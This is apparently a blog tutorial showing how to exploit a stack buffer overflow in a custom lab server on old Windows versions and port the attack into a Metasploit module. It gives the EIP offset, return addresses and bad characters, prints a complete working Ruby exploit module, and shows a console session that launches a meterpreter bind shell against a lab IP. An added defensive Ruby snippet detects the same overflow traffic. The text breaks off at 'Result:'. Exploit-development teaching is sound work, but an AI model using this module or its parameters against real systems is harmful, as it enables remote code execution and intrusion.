From Exploit to Metasploit – The Basic – All things in moderation

Hi all!
Today, we will discuss how to write an exploit as a Metasploit module. Metasploit modules are written in Ruby. Even if you do not know much Ruby, you can still write a Metasploit module based on the instructions below and on the exploits already available in Metasploit.

Metasploit module structure
A typical Metasploit module will include the following sections:

  • header and some dependencies
      • some comments about the exploit module
      • require 'msf/core'
  • class definition
  • includes
  • “def” definitions:
      • initialize
      • check (optional)
      • exploit

In a Metasploit module, comments start with “#”.

Now, let’s build an exploit for a simple vulnerable server!
We will use the vulnerable code below to walk through the process of developing the exploit code.

We will compile the code with lcc-win32.
Run the .exe file on Windows Server 2003 R2 SP2.
When we send 1000 bytes to the server, the server crashes.
Code demo:

[Image: code that sends 1000 bytes]

The server crashes, and EIP gets overwritten with A’s.

[Image: server crash]

Using the Metasploit pattern tools, we determine that the offset to the EIP overwrite is 504 bytes. So we’ll build a new crash script to verify the offset and see the contents of the registers when the overflow occurs:

[Image: built shellcode demo]

After sending 504 A’s, 4 B’s and a bunch of C’s, we can see the following register and stack contents:

Increase the size of $junk to see how much space we have to store shellcode. This is important because we will need to specify this parameter in the Metasploit module.
Change the value of $totalbuffer to 2000. The overflow still takes place as expected, and based on the contents at ESP we can see that we can fill memory up to ESP + 5d3 (1491 bytes). This will be the space that holds our shellcode.
All that remains is to overwrite EIP with the address of a jmp esp (or call esp, or something similar), and put our shellcode in place of the C’s.
Search for a jump instruction in one of the DLLs that is loaded when the program runs. We can use findjmp, or search directly in windbg for the opcode within the address range of the DLL. Here we will search in ws2_32.dll. (You can review both methods.)

The address is 0x71C02B67.
After doing some tests with the shellcode, we reach the following conclusions for building the final exploit:
– exclude 0xff from the shellcode
– put some NOPs before the shellcode
Our final exploit (in Perl, with a shell bound to TCP 5555) looks like this:

(Note: this run is on Windows XP SP2, so we have to change the jump address. On Windows XP SP2 the jump code address is 0x71ab9372.)

Exploit output:

OK! The shellcode has now run successfully. I have connected to the server with telnet. We can now perform any task we want.
The key parameters that we can derive from this exploit:
– The offset is 504 bytes (EIP overwrite)
– On Windows 2003 R2 SP2 (English) the jump address is 0x71C02B67
– The shellcode should not contain 0x00 or 0xff
– The shellcode can be more or less 1400 bytes

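
For a defender, the same parameters describe what this traffic looks like on the wire. The Ruby code below is an added example, not part of the original post: it checks one inbound message against the layout derived above. MAX_EXPECTED_LEN, RUN_THRESHOLD and the two sample messages are assumptions constructed for illustration.

```ruby
# Added example (not from the original post): flag inbound messages that match
# the buffer layout derived above. EIP_OFFSET and KNOWN_RETS restate values from
# the post; MAX_EXPECTED_LEN and RUN_THRESHOLD are assumptions.
EIP_OFFSET       = 504                       # offset to the saved EIP
KNOWN_RETS       = [0x71ab9372, 0x71c02b67]  # jump addresses used in the post
MAX_EXPECTED_LEN = 500                       # assumed largest legitimate request
RUN_THRESHOLD    = 32                        # assumed shortest run worth flagging

# Longest run of one repeated byte: returns [byte, length, start_offset].
def longest_run(data)
  bytes = data.bytes
  best = [nil, 0, 0]
  i = 0
  while i < bytes.length
    j = i
    j += 1 while j < bytes.length && bytes[j] == bytes[i]
    best = [bytes[i], j - i, i] if j - i > best[1]
    i = j
  end
  best
end

# Returns a hash of rule => detail; an empty hash means nothing was flagged.
def inspect_payload(raw)
  data = raw.b
  hits = {}
  if data.bytesize > MAX_EXPECTED_LEN
    hits[:oversized] = "#{data.bytesize} bytes (limit #{MAX_EXPECTED_LEN})"
  end
  byte, len, off = longest_run(data)
  if len >= RUN_THRESHOLD
    hits[:filler_run] = format('0x%02x repeated %d times at offset %d', byte, len, off)
  end
  # The return address is written little-endian (pack('V')), so read it the same way.
  word = data.byteslice(EIP_OFFSET, 4)
  if word && word.bytesize == 4 && KNOWN_RETS.include?(word.unpack1('V'))
    hits[:known_ret] = format('0x%08x at offset %d', word.unpack1('V'), EIP_OFFSET)
  end
  hits
end

# Constructed samples: a short benign request, and a message with the layout
# from the post in which inert 'P' bytes stand in for the payload.
BENIGN  = "HELLO server\n"
CRAFTED = ('A' * 504) + [0x71ab9372].pack('V') + ("\x90" * 50).b + ('P' * 64)
```

A module that fills the offset with make_nops need not send a single repeated byte, so the length rule and the return-address rule are the more dependable of the three.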
Converting the exploit to metasploit

First we need to determine the type of exploit, because that decides where in the Metasploit directory structure the exploit code will be saved. If the target is an FTP server, the module must be placed under the Windows FTP server exploits.
Metasploit modules are stored under the following path (on Kali): /usr/share/metasploit-framework/
We will create our Metasploit module in %Metasploit%/modules/windows/Misc:

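#
#
# Custom metasploit exploit for vulnserver.c
# Written by Cloudi
#
#
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

       include Msf::Exploit::Remote::Tcp

       def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'Custom vulnerable server stack overflow',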
                        'Description'    => %q{
                                        This module exploits a stack overflow in a 
                                        custom vulnerable server.
                                             },
                        'Author'         => [ 'Cloudi' ],
                        'Version'        => '$Revision: 9999 $',
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                },
                        'Payload'        =>
                                {
                                        'Space'    => 1400,
                                        'BadChars' => "\x00\xff",
                                },
                        'Platform'       => 'win',

                        'Targets'        =>
                                [
                                        ['Windows XP SP2 En',
                                          { 'Ret' => 0x71ab9372, 'Offset' => 504 } ],
                                        ['Windows 2003 Server R2 SP2',
                                          { 'Ret' => 0x71c02b67, 'Offset' => 504  } ],
                                ],
                        'DefaultTarget' => 0,

                        'Privileged'     => false
                        ))

                        register_options(
                        [
                                Opt::RPORT(200)
                        ], self.class)
       end

       def exploit
          connect

          junk = make_nops(target['Offset'])
          sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded
          sock.put(sploit)

          handler
          disconnect

       end

end

We see the following components:

  • first, put “require 'msf/core'”, which will be valid for all Metasploit exploits
  • define the class. In our case, it is a remote exploit.
  • next, set exploit information and exploit definitions:
      • include: in our case, it is a plain TCP connection, so we use Msf::Exploit::Remote::Tcp
          • Metasploit has handlers for http, ftp, etc… (which will help you build exploits faster because you don’t have to write the entire conversation yourself)
      • Information:
          • Payload: define the length and badchars (0x00 and 0xff in our case)
          • Define the targets, and define target-specific settings such as return address, offset, etc.
      • Exploit:
          • connect (which will set up the connection to the remote port)
          • build the buffer
              • junk (nops, with size of offset)
              • add the return address, more nops, and then the encoded payload
          • write the buffer to the connection
          • handle the exploit
          • disconnect

Test
We will test on Windows 2k3 SP2.
Open Metasploit on Kali Linux:

A database appears to be already configured, skipping initialization
                                                  
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


Trouble managing data? List, sort, group, tag and search your pentest data
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.8-                             ]
+ -- --=[ 1520 exploits - 880 auxiliary - 259 post        ]
+ -- --=[ 437 payloads - 38 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use windows/misc/test_vulserver
msf exploit(test_vulserver) > show options

Module options (exploit/windows/misc/test_vulserver):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    200              yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP2 En


msf exploit(test_vulserver) > set rhost 192.168.231.143
rhost => 192.168.231.143
msf exploit(test_vulserver) > show targets 

Exploit targets:

   Id  Name
   --  ----
   0   Windows XP SP2 En
   1   Windows 2003 Server R2 SP2


msf exploit(test_vulserver) > set target 0
target => 0
msf exploit(test_vulserver) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(test_vulserver) > show options 

Module options (exploit/windows/misc/test_vulserver):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.231.143  yes       The target address
   RPORT  200              yes       The target port


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.231.143  no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP2 En


msf exploit(test_vulserver) > exploit 

[*] Started bind handler


Result:
